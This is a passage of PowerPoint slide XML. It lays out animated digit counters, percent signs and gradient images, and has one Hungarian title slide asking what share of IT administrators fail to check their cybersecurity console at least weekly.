                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>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950303-F09B-5415-EF35-FFEF9EFB8547}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884648" y="7473798"/>
            <a:ext cx="1730328" cy="30716101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>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F0BD0D-91C2-F115-3051-1CF915A143E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9494912" y="6767306"/>
            <a:ext cx="1730328" cy="3154710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:srgbClr val="0096A1"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>%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CC59DA-C1D5-6139-012A-DA021A07996F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442628" y="-1"/>
            <a:ext cx="6700924" cy="421076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20000">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx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 sz="135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3C0FA4-265A-12D3-6711-468B8BF3F9DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5442628" y="6076239"/>
            <a:ext cx="6700924" cy="421076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20000">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx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 sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF589C21-27EA-32A8-FA8A-9BAE2A4D077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154297" y="-5135233"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23AC7A75-FBBF-1F62-5ED8-D1736FAE71C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12389993" y="4210767"/>
            <a:ext cx="30852902" cy="18460182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EC5711E-F1E5-0D03-CE7C-73CD742B096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156403" y="-20176843"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCE721ED-AD6D-F939-4E09-7A04EA148A0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14564003" y="-6603007"/>
            <a:ext cx="13737594" cy="8773514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24D5AA4-0F3C-3571-428B-E25373E517C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16073287" y="7213073"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E61A9F2F-13C0-087F-B843-3FF6086AA9E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>
            <a:off x="-13167121" y="6256137"/>
            <a:ext cx="19520718" cy="138620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EA10B12-4F55-2866-87D5-845DBCBA0268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3112405" y="1427389"/>
            <a:ext cx="12032414" cy="697555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indent="0" defTabSz="2814337">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="838"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="10400" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="754164" indent="0" defTabSz="2814337">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="838"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3771" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1508328" indent="0" defTabSz="2814337">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="838"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3771" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Microsoft GothicNeo" panose="020B0500000101010101" pitchFamily="34" charset="-127"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2262492" indent="0" defTabSz="2814337">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="838"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3771">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="3016656" indent="0" defTabSz="2814337">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="838"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="3771">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="7739422" indent="-703583" defTabSz="2814337">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="6157"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="9146590" indent="-703583" defTabSz="2814337">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="6157"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="10553758" indent="-703583" defTabSz="2814337">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="6157"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="11960925" indent="-703583" defTabSz="2814337">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="6157"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" dirty="0"/>
              <a:t>Az IT adminisztrátorok hány százaléka NEM ellenőrzi a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" dirty="0" err="1"/>
              <a:t>kiberbiztonsági</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" dirty="0"/>
              <a:t> konzolt, legalább </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hetente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00BBC5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7508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101F56-208A-30EE-421B-D8782657E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D219EFC-9E84-1294-E923-A6D392DF60DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604310" y="-17958728"/>
            <a:ext cx="1730328" cy="30716101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>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48B40A-7A6E-77BA-B4D2-C9C65F59754D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7884648" y="-11896118"/>
            <a:ext cx="1730328" cy="30716101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>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789D6E-53FC-7A9A-DA10-4CFEFED9639B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9494912" y="3502084"/>
            <a:ext cx="1730328" cy="3154710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="19900">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Calibri Bold"/>
              </a:rPr>
              <a:t>%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24E52A-C145-30B9-B87F-8F54FF520935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5442628" y="-1"/>
            <a:ext cx="6700924" cy="421076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20000">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx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 sz="135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AC74BC-C81F-D338-49D0-7E6DB321FA9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5442628" y="6076239"/>
            <a:ext cx="6700924" cy="421076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20000">
                <a:schemeClr val="tx1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx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 sz="1350"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="!!Gradient TEAL" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52C6309-432A-C16B-28B5-D1A3EA41E34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154297" y="-5135233"/>
            <a:ext cx="30375286" cy="18691998"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="!!Gradient PURPLE" descr="A purple line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{173E9B6E-D771-3F78-1246-12FAA37C616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12389993" y="4210767"/>
            <a:ext cx="30852902" cy="18460182"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="!!Gradient TEAL 2" descr="A green light in the dark&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{056F2B0C-603F-EE6F-9043-4B0D5376AB7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181367" y="-19317757"/>
            <a:ext cx="43317174" cy="26656030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="!!Gradient CRIMSON" descr="A red light in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30744F60-5E93-DB04-07B0-A9CC5FC93BD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14564003" y="-6603007"/>
            <a:ext cx="13737594" cy="8773514"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="!!Gradient GREEN" descr="A green line in the dark&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5D7BCFE-83F7-6EBA-DB3B-A55633183C1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16073287" y="7213073"/>
            <a:ext cx="10895238" cy="7504762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="!!Gradient TEAL Fat" descr="A blue oval with black background&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E3E9F7-2B2D-BC45-68F2-6F8BBECC683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>
            <a:off x="-13167121" y="6256137"/>
            <a:ext cx="19520718" cy="1386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006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ED9433-81E9-5AB0-7B4C-CAD4EC174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!!Agenda">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C352283-F403-3933-3CA8-35BA123052AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
